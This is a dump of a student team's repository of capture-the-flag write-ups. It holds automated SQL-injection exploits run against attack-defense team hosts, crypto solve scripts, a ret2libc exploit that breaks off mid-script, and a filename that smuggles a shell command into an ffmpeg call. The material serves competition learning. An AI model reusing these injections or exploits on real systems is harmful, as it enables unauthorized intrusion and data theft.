├── .all-contributorsrc ├── AD-INCTF-SECCON ├── README.md ├── masalaD │ ├── exploit.py │ └── utilities.py └── postoffice │ ├── exploit.py │ └── utilities.py ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── CSAW Quals 2020 ├── Crypto │ ├── Perfect Secrecy │ │ ├── README.md │ │ ├── image1.png │ │ ├── image2.png │ │ └── result.png │ ├── authy │ │ ├── README.md │ │ ├── handout.py │ │ └── solve.py │ └── modulus_operadi │ │ ├── README.md │ │ └── solve.py ├── Pwn │ ├── roppity │ │ ├── README.md │ │ ├── libc-2.27.so │ │ ├── rop │ │ └── solve.py │ └── slithery │ │ ├── README.md │ │ ├── blacklist.py │ │ └── sandbox.py ├── README.md ├── Rev │ ├── baby_mult │ │ ├── README.md │ │ └── program.txt │ └── not_malware │ │ ├── README.md │ │ └── not_malware └── Web │ └── flask_caching │ ├── README.md │ ├── app.py │ └── solve.py ├── CyBRICS CTF ├── CTB │ └── DockEsc │ │ └── README.md ├── Cyber │ └── Serial │ │ └── README.md ├── README.md └── Web │ ├── Gif2png │ ├── README.md │ └── csictf.gif' -vf drawtext=\"text=$(grep ffLaG main.py)\"'.gif │ └── Hunt │ └── README.md ├── CyberHome CTF ├── Cryptography │ └── Artemis │ │ ├── Artemis │ │ ├── README.md │ │ └── artemis.htm ├── README.md ├── Reverse Engineering │ ├── arg1 │ │ ├── README.md │ │ └── arg01 │ ├── arg2 │ │ ├── README.md │ │ └── arg2 │ └── lemon_zest │ │ ├── README.md │ │ └── lemon_zest.py └── Steganography │ └── 54V3_7H3_W0R1D │ ├── README.md │ └── flag.ico ├── DUCTF ├── README.md ├── crypto │ ├── babyrsa │ │ ├── README.md │ │ └── solve.py │ ├── hex-cipher-shift │ │ ├── README.md │ │ └── exploit.py │ └── rot-i │ │ └── README.md ├── forensics │ ├── i-love-scomo │ │ ├── README.md │ │ ├── ilovescomo.jpg │ │ ├── ilovescomo.jpg.out │ │ └── solve.py │ └── spot-the-difference │ │ ├── Publish.zip │ │ └── README.md └── pwn │ ├── return-to-what │ ├── README.md │ ├── libc6_2.27-3ubuntu1_amd64.so │ └── return-to-what │ └── shellthis │ ├── README.md │ └── shellthis ├── DarkCTF 2020 ├── Crypto │ ├── Duplicacy Within │ │ └── exploit.py │ ├── 
E-AES │ │ └── README.md │ ├── Easy RSA │ │ └── solve.py │ ├── Pipe Rhyme │ │ └── exploit.py │ ├── Weird Encryption │ │ ├── Encrypted │ │ ├── enc.py │ │ └── solve.py │ └── haxXor │ │ └── exploit.py ├── Misc │ ├── Flag of Life │ │ └── README.md │ ├── Minesweeper │ │ └── exploit.py │ └── QuickFix │ │ ├── fix.py │ │ └── show_flag.py ├── Pwn │ ├── newPaX │ │ ├── exploit.py │ │ ├── libc6-i386_2.27-3ubuntu1.2_amd64.so │ │ └── newPaX │ └── roprop │ │ ├── exploit.py │ │ ├── libc-2.27.so │ │ └── roprop ├── README.md ├── Rev │ └── Jack │ │ ├── exploit.py │ │ └── jack └── Web │ ├── Agent-U │ └── exploit.py │ ├── Apache Logs │ └── solve.js │ ├── Chain Race │ └── exploit.py │ ├── Dusty │ └── exploit.py │ ├── PHP Information │ └── exploit.py │ ├── Safe House │ └── exploit.py │ ├── So_Simple │ └── exploit.py │ └── Source │ └── exploit.py ├── Deconstruct.f ├── Forensics │ ├── Mike │ │ ├── README.md │ │ ├── desktop_wallpaper.png │ │ ├── flag.png │ │ └── stegsolve.png │ ├── Teg Rads │ │ ├── README.md │ │ ├── alexa.png │ │ ├── ctrl+a.png │ │ ├── exploit.py │ │ ├── fdp.pdf │ │ ├── p4.png │ │ ├── part1.png │ │ ├── part2.png │ │ ├── part3.png │ │ ├── part4.png │ │ ├── part5.png │ │ ├── pdf.png │ │ ├── strings1.png │ │ ├── strings2.png │ │ ├── strings3.png │ │ ├── strings4.png │ │ └── strings5.png │ └── The Missing Journalist │ │ ├── README.md │ │ ├── exiftool.png │ │ ├── flag.png │ │ ├── pdfpass.png │ │ ├── pdfpassprompt.png │ │ ├── strings.png │ │ └── the_journalist.gif ├── OSINT │ ├── AHF │ │ ├── 1.png │ │ ├── 2.png │ │ ├── README.md │ │ ├── flag.png │ │ └── team.pdf │ └── Dora the Explorer │ │ └── README.md ├── README.md ├── pwn │ ├── Reject humanity return to libc │ │ ├── Package.tar │ │ ├── README.md │ │ ├── challenge │ │ ├── dispenser_login.c │ │ ├── lib │ │ │ └── x86_64-linux-gnu │ │ │ │ └── libc-2.31.so │ │ └── solve.py │ └── destructinator │ │ └── README.md └── web │ ├── Curly Fries 1 │ └── README.md │ ├── Curly Fries 2 │ └── README.md │ ├── Curly Fries 3 │ └── README.md │ ├── 
Hungry Man │ ├── README.md │ └── hungry.py │ ├── gate keeper │ └── README.md │ └── taxi union │ └── README.md ├── Fword CTF ├── Miscellaneous │ ├── Secret Array │ │ └── README.md │ └── Twis Twis Little Star │ │ └── README.md ├── README.md └── Reversing │ └── Tornado │ └── README.md ├── Google CTF ├── README.md └── Web │ └── Log-Me-In │ ├── README.md │ ├── app.js │ └── solve.py ├── HSCTF 7 ├── Binary Exploitation │ └── boredom │ │ ├── README.md │ │ ├── boredom │ │ ├── boredom.c │ │ └── static │ │ ├── img1.png │ │ ├── img2.png │ │ └── img3.png ├── Miscellaneous │ └── My First Calculator │ │ ├── README.md │ │ └── calculator.py └── README.md ├── HacktivityCon CTF ├── Cryptography │ └── Tyrannosaurus Rex │ │ └── README.md ├── Mobile │ └── Mobile One │ │ ├── README.md │ │ └── mobile_one.apk ├── Pwn │ └── README.md ├── README.md ├── Scripting │ ├── Flushed │ │ └── README.md │ ├── Hashbrown Caserole │ │ └── README.md │ ├── Impartial │ │ └── README.md │ ├── Misdirection │ │ └── README.md │ ├── Prophecy │ │ └── README.md │ ├── Rescue Mission │ │ └── README.md │ └── Tootsie Pop │ │ ├── README.md │ │ └── pop.zip ├── Steganography │ ├── Chess Cheater │ │ ├── README.md │ │ └── morse.wav │ ├── Cold War │ │ ├── README.md │ │ └── cold_war.txt │ └── Spy vs. 
Spy │ │ ├── README.md │ │ └── spy_vs_spy.png └── Web │ └── Template Shack │ └── README.md ├── LICENSE ├── NahamCon CTF ├── Crpytography │ └── Homecooked │ │ ├── README.md │ │ ├── decrypt.py │ │ └── primes1.txt ├── README.md ├── Scripting │ └── Rotten │ │ ├── README.md │ │ └── script.py ├── Warmup │ ├── Easy Keesy │ │ ├── README.md │ │ └── easy_keesy │ └── UGGC │ │ └── README.md └── Web │ ├── Agent 95 │ └── README.md │ └── Localghost │ └── README.md ├── README.md ├── UMDCTF 2021 ├── Crypto │ └── Art Class.md ├── OSINT │ └── vacation.md ├── Programming │ └── Jay1_and_Jay2.md ├── forensics │ └── NotSlick.md └── stegnography │ └── pickle_rick.md ├── Zh3r0 CTF ├── Pwn │ ├── Command 1 │ │ ├── README.md │ │ ├── command_1 │ │ └── static │ │ │ └── img1.png │ └── Free Flag │ │ ├── README.md │ │ ├── chall │ │ └── static │ │ ├── img1.png │ │ ├── img2.png │ │ ├── img3.png │ │ └── img4.png ├── README.md ├── Reversing │ └── snakes everywhere │ │ ├── README.md │ │ ├── guess.py │ │ ├── py_dis1 │ │ ├── rev.py │ │ └── snake.txt └── Web │ └── Google Source Code │ ├── README.md │ ├── payload.php │ └── static │ ├── img1.png │ ├── img2.png │ ├── img3.png │ └── img4.png └── redpwnCTF 2020 ├── README.md ├── crypto ├── 12-shades-of-redpwn │ ├── README.md │ ├── ciphertext.jpg │ ├── color-wheel.jpg │ └── sol ├── 4k-rsa │ ├── 4k-rsa-public-key.txt │ ├── 4k-rsa.py │ └── README.md ├── base646464 │ ├── README.md │ ├── cipher.txt │ └── generate.js └── pseudo-key │ ├── README.md │ ├── crack.py │ ├── pseudo-key-output.txt │ └── pseudo-key.py ├── misc └── CaaSINO │ ├── README.md │ └── calculator.js ├── pwn ├── coffer-overflow-0 │ ├── README.md │ ├── coffer-overflow-0 │ └── coffer-overflow-0.c ├── coffer-overflow-1 │ ├── README.md │ ├── coffer-overflow-1 │ └── coffer-overflow-1.c └── coffer-overflow-2 │ ├── README.md │ ├── coffer-overflow-2 │ └── coffer-overflow-2.c ├── rev ├── bubbly │ ├── README.md │ ├── bubbly │ └── static │ │ └── img1.png └── ropes │ ├── README.md │ └── ropes └── web ├── 
inspector-general └── README.md ├── login ├── README.md └── static │ └── img1.png ├── panda-facts ├── README.md └── index.js ├── static-pastebin └── README.md ├── static-static-hosting └── README.md └── tux-fanpage ├── README.md └── index.js /.all-contributorsrc: -------------------------------------------------------------------------------- 1 | { 2 | "files": [ 3 | "README.md" 4 | ], 5 | "imageSize": 100, 6 | "commit": false, 7 | "contributors": [ 8 | { 9 | "login": "roerohan", 10 | "name": "Rohan Mukherjee", 11 | "avatar_url": "https://avatars0.githubusercontent.com/u/42958812?v=4", 12 | "profile": "https://github.com/roerohan", 13 | "contributions": [ 14 | "doc" 15 | ] 16 | }, 17 | { 18 | "login": "thebongy", 19 | "name": "Rishit Bansal", 20 | "avatar_url": "https://avatars1.githubusercontent.com/u/7080652?v=4", 21 | "profile": "https://github.com/thebongy", 22 | "contributions": [ 23 | "doc" 24 | ] 25 | }, 26 | { 27 | "login": "Mannan-Goyal", 28 | "name": "Mannan Goyal", 29 | "avatar_url": "https://avatars.githubusercontent.com/u/72966340?v=4", 30 | "profile": "https://github.com/Mannan-Goyal", 31 | "contributions": [ 32 | "doc" 33 | ] 34 | }, 35 | { 36 | "login": "salt57", 37 | "name": "salt57", 38 | "avatar_url": "https://avatars.githubusercontent.com/u/45989024?v=4", 39 | "profile": "https://github.com/salt57", 40 | "contributions": [ 41 | "doc" 42 | ] 43 | }, 44 | { 45 | "login": "Rakesh1772", 46 | "name": "Rakesh1772", 47 | "avatar_url": "https://avatars.githubusercontent.com/u/77398468?v=4", 48 | "profile": "https://github.com/Rakesh1772", 49 | "contributions": [ 50 | "doc" 51 | ] 52 | }, 53 | { 54 | "login": "sanjaybaskaran01", 55 | "name": "Sanjay Kumar Baskaran", 56 | "avatar_url": "https://avatars.githubusercontent.com/u/72266283?v=4", 57 | "profile": "https://www.linkedin.com/in/sanjaybaskaran", 58 | "contributions": [ 59 | "doc" 60 | ] 61 | }, 62 | { 63 | "login": "UnknownAbyss", 64 | "name": "Additya Singhal", 65 | "avatar_url": 
"https://avatars.githubusercontent.com/u/44570898?v=4", 66 | "profile": "https://github.com/UnknownAbyss", 67 | "contributions": [ 68 | "doc" 69 | ] 70 | } 71 | ], 72 | "contributorsPerLine": 7, 73 | "projectName": "CTF-Write-ups", 74 | "projectOwner": "csivitu", 75 | "repoType": "github", 76 | "repoHost": "https://github.com", 77 | "skipCi": true 78 | } 79 | -------------------------------------------------------------------------------- /AD-INCTF-SECCON/README.md: -------------------------------------------------------------------------------- 1 | # AD-INCTF-SECCON 2 | 3 | ## Organizers 4 | - team bi0s 5 | - CISCO 6 | 7 | Rank - 2 8 | 9 | - Official URL: http://ad.inctf.in 10 | - Format: Attack Defense 11 | - Duration: Sun, 12 Oct. 2020, 09:00 IST — Sun, 12 Oct. 2020, 21:00 IST 12 | -------------------------------------------------------------------------------- /AD-INCTF-SECCON/masalaD/exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import random 3 | import string 4 | import json 5 | from utilities import extract_flag, submit_flag 6 | 7 | s = requests.Session() 8 | host = '10.42.0.72' 9 | port = 5200 10 | 11 | url = lambda x: f'http://{host}:{port}' + x 12 | 13 | def random_string(l): 14 | return ''.join(random.choice(string.ascii_letters) for i in range(l)) 15 | 16 | 17 | def signup(name, password, email): 18 | r = s.post(url('/signup'), data={ 19 | "name": name, 20 | "password": password, 21 | "email": email, 22 | }, timeout=4) 23 | 24 | print(r.status_code) 25 | # print(r.text) 26 | return r.text 27 | 28 | 29 | def login(email, password): 30 | r = s.post(url('/login'), data= { 31 | "email": email, 32 | "password": password, 33 | }, timeout=4) 34 | 35 | # print(r.text) 36 | return r.text 37 | 38 | 39 | def get_show_cart(): 40 | r = s.get(url('/show_cart'), timeout=4) 41 | 42 | return r.text 43 | 44 | 45 | teams = json.load(open('teamlist.json'))[::-1][6:] 46 | for team in teams: 47 | try: 48 
| host = team['ip'] 49 | print(f'Exploiting team {team["name"]} for {url("/")}') 50 | name = "' or 1=1 -- " 51 | password = random_string(10) 52 | email = random_string(10) 53 | signup(name, password, email) 54 | login(email, password) 55 | x = get_show_cart() 56 | 57 | flags = extract_flag(x) 58 | print(flags) 59 | 60 | submit_flag(flags) 61 | except Exception: 62 | print(f'Failed for {team["name"]}') 63 | 64 | -------------------------------------------------------------------------------- /AD-INCTF-SECCON/masalaD/utilities.py: -------------------------------------------------------------------------------- 1 | from pwn import remote 2 | import time 3 | import re 4 | import os 5 | 6 | def extract_flag(text): 7 | return re.findall(r'bi0s\{\w{26}\}', text) 8 | 9 | def submit_flag(flag, host='10.40.0.2', port=5555): 10 | if isinstance(flag, list): 11 | flag = '\n'.join(flag) 12 | 13 | print(f'[INFO] Submitting flag {flag} to {host}:{port}.') 14 | 15 | r = remote(host, port) 16 | r.sendline(flag) 17 | 18 | if '\n' in flag: 19 | for _ in range(len(flag.split('\n'))): 20 | print(r.recvline()) 21 | else: 22 | print(r.recvline()) 23 | 24 | r.close() 25 | 26 | -------------------------------------------------------------------------------- /AD-INCTF-SECCON/postoffice/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from utilities import extract_flag, submit_flag 3 | import json 4 | import threading 5 | 6 | port = 8080 7 | 8 | def random_string(l): 9 | return ''.join(random.choice(string.ascii_letters) for i in range(l)) 10 | 11 | 12 | def register(username, email, password, host): 13 | r = remote(host, port, level='error') 14 | 15 | 16 | r.sendline('1') 17 | 18 | print(r.recvuntil('Username: ').decode()) 19 | 20 | r.sendline(username) 21 | 22 | print(r.recvuntil('Email: ').decode()) 23 | 24 | r.sendline(email) 25 | 26 | print(r.recvuntil('Password:').decode()) 27 | r.sendline(password) 28 | 29 | 
r.close() 30 | 31 | def admin_stuff(host): 32 | r = remote(host, port, level='error') 33 | 34 | print('\n\n DOING ADMIN STUFF \n\n') 35 | 36 | print(r.recvuntil('Your choice(1-2): ').decode()) 37 | r.sendline('2') 38 | 39 | print(r.recvuntil('Email: ').decode()) 40 | 41 | r.sendline('admin@gmail.com') 42 | 43 | print(r.recvuntil('Password: ').decode()) 44 | r.sendline('adminpassword') 45 | 46 | x = r.recvall().decode().strip().split('\n')[2:] 47 | return x 48 | 49 | def exploit(email, password, token, host): 50 | r = remote(host, port, level='error') 51 | 52 | print('\n\n DOING EXPLOIT \n\n') 53 | 54 | 55 | r.recvuntil('Your choice(1-2): ').decode() 56 | r.sendline('2') 57 | 58 | r.recvuntil('Email: ').decode() 59 | 60 | r.sendline(email) 61 | 62 | r.recvuntil('Password: ').decode() 63 | r.sendline(password) 64 | 65 | 66 | r.recvuntil('Your choice(1-3): ').decode() 67 | r.sendline('2') 68 | 69 | r.sendline(token) 70 | text = r.recvall().decode() 71 | 72 | flags = extract_flag(text) 73 | r.close() 74 | 75 | print(f'GOT FLAG {flags[0]}\n\n\n') 76 | 77 | print(host) 78 | 79 | return flags 80 | 81 | teams = json.load(open('teamlist.json')) 82 | 83 | used_tokens = {} 84 | 85 | def exploit_team(): 86 | while True: 87 | if len(teams) == 0: 88 | return 89 | else: 90 | team = teams.pop() 91 | try: 92 | host = team['ip'] 93 | 94 | username = random_string(10) 95 | email = username + '@gmail.com' 96 | password = random_string(10) 97 | register(username, email, password, host) 98 | tokens = admin_stuff(host) 99 | 100 | if not used_tokens.get(team['ip']): 101 | used_tokens[team['ip']] = {} 102 | 103 | for token in tokens: 104 | if token not in used_tokens[team['ip']]: 105 | used_tokens[team['ip']][token] = exploit(email, password, token, host)[0] 106 | 107 | print(f'\n\n\n\n\n\nSUBMITTING FOR TEAM {team}\n\n\n\n\n\n') 108 | 109 | submit_flag(list(used_tokens[team['ip']].values())) 110 | 111 | 112 | except Exception: 113 | print(f'Failed for {team["name"]}') 114 | 115 | 116 | 
jobs = [] 117 | 118 | for i in range(10): 119 | x = threading.Thread(target=exploit_team) 120 | jobs.append(x) 121 | x.start() 122 | 123 | for job in jobs: 124 | job.join() 125 | 126 | -------------------------------------------------------------------------------- /AD-INCTF-SECCON/postoffice/utilities.py: -------------------------------------------------------------------------------- 1 | from pwn import remote 2 | import time 3 | import re 4 | import os 5 | 6 | def extract_flag(text): 7 | return re.findall(r'bi0s\{\w{26}\}', text) 8 | 9 | def submit_flag(flag, host='10.40.0.2', port=5555): 10 | if isinstance(flag, list): 11 | flag = '\n'.join(flag) 12 | 13 | print(f'[INFO] Submitting flag {flag} to {host}:{port}.') 14 | 15 | r = remote(host, port) 16 | r.sendline(flag) 17 | 18 | if '\n' in flag: 19 | for _ in range(len(flag.split('\n'))): 20 | print(r.recvline()) 21 | else: 22 | print(r.recvline()) 23 | 24 | r.close() 25 | 26 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing 2 | 3 | Thanks for contributing! :smile: 4 | 5 | The following is a set of guidelines for contributing. These are mostly guidelines, not rules. Use your best judgment, and feel free to propose changes to this document in a pull request. 6 | 7 | > Note: Contributions should be made via pull requests to the dev branch of the repository. 8 | 9 | ## Table of Contents 10 | 11 | 1. [Styleguides](#styleguides) 12 | 2. [What should I know before I get started?](#what-should-i-know-before-i-get-started) 13 | 3. [How Can I contribute?](#how-can-i-contribute) 14 | 15 | # Guidelines 16 | The following are the guidelines we request you to follow in order to contribute to this project. 
17 | 18 | ## Styleguides 19 | 20 | ### Commit Messages 21 | 22 | The commit messages should follow the following pattern: 23 | ```bash 24 | feat: Description # if a new feature is added 25 | fix: Description # if a bug is fixed 26 | refactor: Description # if code is refactored 27 | docs: Description # if documentation is added 28 | lint: Description # if a lint issue is fixed 29 | ``` 30 | ### Issues 31 | 32 | ```bash 33 | update: Description # if an update is required for a feature 34 | bug: Description # if there is a bug in a particular feature 35 | suggestion: Description # if you want to suggest a better way to implement a feature 36 | ``` 37 | ### Code Styleguide 38 | The code should satisfy the following: 39 | - Have meaningful variable names, either in `snake_case` or `camelCase`. 40 | - Have no `lint` issues. 41 | - Have meaningful file names, directory names and directory structure. 42 | - Have a scope for easy fixing, refactoring and scaling. 43 | 44 | ### Pull Requests 45 | Pull requests should have: 46 | - A concise commit message. 47 | - A description of what was changed/added. 48 | 49 | ## What should I know before I get started 50 | You can contribute to any of the features you want, here's what you need to know: 51 | - How the project works. 52 | - The technology stack used for the project. 53 | - A brief idea about writing documentation. 54 | 55 | ## How Can I Contribute 56 | 57 | You can contribute by: 58 | - Reporting Bugs 59 | - Suggesting Enhancements 60 | - Code Contribution 61 | - Pull Requests 62 | 63 | Make sure to document the contributions well in the pull request. 64 | 65 | > It is not compulsory to follow the guidelines mentioned above, but it is strongly recommended. 
-------------------------------------------------------------------------------- /CSAW Quals 2020/Crypto/Perfect Secrecy/README.md: -------------------------------------------------------------------------------- 1 | # Perfect Secrecy 2 | 3 | Author: [roerohan](https://github.com/roerohan) and [thebongy](https://github.com/thebongy) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | - [image1.png](./image1.png) 12 | - [image2.png](./image2.png) 13 | 14 | ``` 15 | Alice sent over a couple of images with sensitive information to Bob, encrypted with a pre-shared key. It is the most secure encryption scheme, theoretically... 16 | ``` 17 | 18 | # Exploitation 19 | 20 | This challenge took a bit of guessing, but if you XOR every pixel from `image1` with every pixel from `image2` and save that image, you get the [result.png](./result.png) image which has a base64 string that can be decoded to get the flag. 21 |
22 | 23 | You can get the image using: 24 | 25 | ```py 26 | from PIL import Image 27 | import numpy as np 28 | 29 | def read_image(imPath): 30 | im = Image.open(imPath) 31 | 32 | pix_val = list(map(lambda x: int(x != 0), im.getdata())) 33 | return pix_val 34 | 35 | data1 = read_image('image1.png') 36 | data2 = read_image('image2.png') 37 | 38 | res = [None] * len(data1) 39 | 40 | for i in range(len(res)): 41 | if data1[i] ^ data2[i] == 1: 42 | res[i] = 1 43 | else: 44 | res[i] = 0 45 | 46 | array = np.array(res, dtype=np.uint8) 47 | im = np.reshape(array,(256,256)) 48 | 49 | img = Image.fromarray(np.uint8(im * 255) , 'L') 50 | img.save('./result.png') 51 | 52 | print('Written successfully.') 53 | 54 | """ 55 | echo ZmxhZ3swbjNfdDFtM19QQGQhfQ== | base64 -d 56 | flag{0n3_t1m3_P@d!} 57 | """ 58 | ``` 59 | 60 | Once you get this, you can decode the base64 string with the help of `base64` in linux. 61 | 62 | ```bash 63 | echo ZmxhZ3swbjNfdDFtM19QQGQhfQ== | base64 -d 64 | flag{0n3_t1m3_P@d!} 65 | ``` 66 | 67 | The flag is: 68 | 69 | ``` 70 | flag{0n3_t1m3_P@d!} 71 | ``` 72 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Crypto/Perfect Secrecy/image1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CSAW Quals 2020/Crypto/Perfect Secrecy/image1.png -------------------------------------------------------------------------------- /CSAW Quals 2020/Crypto/Perfect Secrecy/image2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CSAW Quals 2020/Crypto/Perfect Secrecy/image2.png -------------------------------------------------------------------------------- /CSAW Quals 2020/Crypto/Perfect Secrecy/result.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CSAW Quals 2020/Crypto/Perfect Secrecy/result.png -------------------------------------------------------------------------------- /CSAW Quals 2020/Crypto/authy/solve.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import base64 3 | 4 | local = False 5 | 6 | url = lambda x: "http://crypto.chal.csaw.io:5003" + x 7 | 8 | if local: 9 | url = lambda x: "http://localhost:5000" + x 10 | 11 | 12 | def view(id, integrity): 13 | print(f"\n\nSending id={id}, integrity={integrity}\n\n") 14 | r = requests.post( 15 | url("/view"), 16 | data={ 17 | "id": id, 18 | "integrity": integrity, 19 | }, 20 | ) 21 | 22 | print("\n\n") 23 | print(r.text) 24 | return r.text 25 | 26 | 27 | data = { 28 | "entrynum": 7, 29 | "author": "&admin=True", 30 | "note": "&access_sensitive=True&entrynum=7", 31 | } 32 | 33 | r = requests.post(url("/new"), data=data) 34 | 35 | encoded, hexdigest = r.text.strip().split(":") 36 | encoded = encoded.split('Successfully added ')[1] 37 | 38 | print("Encoded: " + encoded) 39 | print("Hexdigest: " + hexdigest) 40 | 41 | flag = view(encoded, hexdigest) 42 | 43 | ''' 44 | flag{h4ck_th3_h4sh} 45 | ''' -------------------------------------------------------------------------------- /CSAW Quals 2020/Crypto/modulus_operadi/README.md: -------------------------------------------------------------------------------- 1 | # modulus_operandi 2 | 3 | Author: [roerohan](https://github.com/roerohan) and [thebongy](https://github.com/thebongy) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | ``` 12 | Can't play CSAW without your favorite block cipher! 
13 | 14 | nc crypto.chal.csaw.io 5001 15 | ``` 16 | 17 | # Exploitation 18 | 19 | The exploit is based on the fact that the ciphertext generated using ECB will have repeating blocks because of the way it works, while CBC will not have such blocks. 20 |
21 | 22 | The following script can be used to get the flag. 23 | 24 | ```py 25 | from pwn import remote 26 | 27 | l = [] 28 | 29 | def connect(): 30 | r = remote('crypto.chal.csaw.io', 5001) 31 | 32 | print(r.recvuntil('\n').decode()) 33 | 34 | return r 35 | 36 | 37 | def send(r, x): 38 | r.sendline(x) 39 | print(x) 40 | 41 | 42 | def run(r): 43 | x = r.clean() 44 | print(x) # Enter plaintext 45 | 46 | send(r, 'a' * 64) 47 | 48 | print(r.recvuntil('Ciphertext is: ')) 49 | x = r.recvline().decode() # Ciphertext value 50 | print(x) 51 | 52 | if x[0:32] == x[32:64]: 53 | mode = 'ECB' 54 | l.append(0) 55 | else: 56 | mode = 'CBC' 57 | l.append(1) 58 | 59 | print(r.recvline()) # ECB or CBC 60 | 61 | send(r, mode) 62 | 63 | 64 | 65 | def solve(): 66 | r = connect() 67 | 68 | i = 0 69 | while True: 70 | try: 71 | run(r) 72 | except: 73 | print(i) 74 | print(r.recvall()) 75 | print(l) 76 | exit(1) 77 | i+=1 78 | 79 | r.interactive() 80 | 81 | solve() 82 | 83 | ''' 84 | [0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1] 85 | ''' 86 | ``` 87 | 88 | In this list, ECB is 0 and CBC is 1. You can then group these into 8 and treat them as binary to get the flag. 
89 | 90 | ```py 91 | >>> ''.join([chr(int(''.join(map(str, l[0+i:8+i])), 2)) for i in range(0, len(l 92 | ), 8)]) 93 | 'flag{ECB_re@lly_sUck$}' 94 | ``` 95 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Crypto/modulus_operadi/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import remote 2 | 3 | l = [] 4 | 5 | def connect(): 6 | r = remote('crypto.chal.csaw.io', 5001) 7 | 8 | print(r.recvuntil('\n').decode()) 9 | 10 | return r 11 | 12 | 13 | def send(r, x): 14 | r.sendline(x) 15 | print(x) 16 | 17 | 18 | def run(r): 19 | x = r.clean() 20 | print(x) # Enter plaintext 21 | 22 | send(r, 'a' * 64) 23 | 24 | print(r.recvuntil('Ciphertext is: ')) 25 | x = r.recvline().decode() # Ciphertext value 26 | print(x) 27 | 28 | if x[0:32] == x[32:64]: 29 | mode = 'ECB' 30 | l.append(0) 31 | else: 32 | mode = 'CBC' 33 | l.append(1) 34 | 35 | print(r.recvline()) # ECB or CBC 36 | 37 | send(r, mode) 38 | 39 | 40 | 41 | def solve(): 42 | r = connect() 43 | 44 | i = 0 45 | while True: 46 | try: 47 | run(r) 48 | except: 49 | print(i) 50 | print(r.recvall()) 51 | print(l) 52 | exit(1) 53 | i+=1 54 | 55 | r.interactive() 56 | 57 | solve() 58 | 59 | ''' 60 | [0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1] 61 | ''' -------------------------------------------------------------------------------- /CSAW Quals 2020/Pwn/roppity/README.md: 
-------------------------------------------------------------------------------- 1 | # roppity 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Python 8 | - Pwntools 9 | 10 | # Source 11 | 12 | - [roppity](./roppity) 13 | 14 | ``` 15 | Welcome to pwn! 16 | 17 | nc pwn.chal.csaw.io 5016 18 | ``` 19 | 20 | # Exploitation 21 | 22 | This is a ret2libc challenge, where you have to overflow the stack using the `gets` function. Here's a script to do the same. 23 | 24 | ```py 25 | from pwn import * 26 | 27 | elf = ELF('./rop') 28 | rop = ROP(elf) 29 | 30 | local = False 31 | 32 | host = 'pwn.chal.csaw.io' 33 | port = 5016 34 | 35 | if local: 36 | p = elf.process() 37 | libc = ELF('/usr/lib/libc.so.6') 38 | else: 39 | p = remote(host, port) 40 | libc = ELF('./libc-2.27.so') 41 | 42 | 43 | PUTS_PLT = elf.plt['puts'] 44 | MAIN_PLT = elf.symbols['main'] 45 | 46 | # Same as ROPgadget --binary ./rop | grep "pop rdi" 47 | POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0] 48 | RET = rop.find_gadget(['ret'])[0] 49 | 50 | OFFSET = b'A' * (0x20 + 0x8) 51 | 52 | 53 | log.info("puts@plt: " + hex(PUTS_PLT)) 54 | log.info('main@plt: ' + hex(MAIN_PLT)) 55 | log.info("pop rdi; ret; gadget: " + hex(POP_RDI)) 56 | 57 | 58 | def get_addr(func_name): 59 | FUNC_GOT = elf.got[func_name] 60 | log.info(func_name + ' GOT @ ' + 